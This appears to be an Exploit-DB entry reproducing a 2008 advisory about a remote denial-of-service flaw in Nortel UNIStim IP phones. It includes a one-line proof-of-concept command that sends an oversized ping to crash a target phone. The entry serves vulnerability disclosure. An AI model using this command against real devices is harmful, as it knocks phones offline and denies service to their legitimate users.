Nortel UNIStim IP Phone - Remote Ping Denial of Service

EDB-ID:

31306


Author:

sipherr

Type:

dos


Platform:

Hardware

Date:

2008-02-26


source: https://www.securityfocus.com/bid/28004/info

Nortel UNIStim IP Phone products are prone to a remote denial-of-service vulnerability because the software fails to properly handle unexpected network datagrams.

Successfully exploiting this issue allows remote attackers to crash affected phones, denying service to legitimate users.

Phones with firmware 0604DAS are vulnerable to this issue. Other versions are also reportedly affected, but we don't know which specific versions. 

The following command will demonstrate this issue:

ping -s 65500 <target>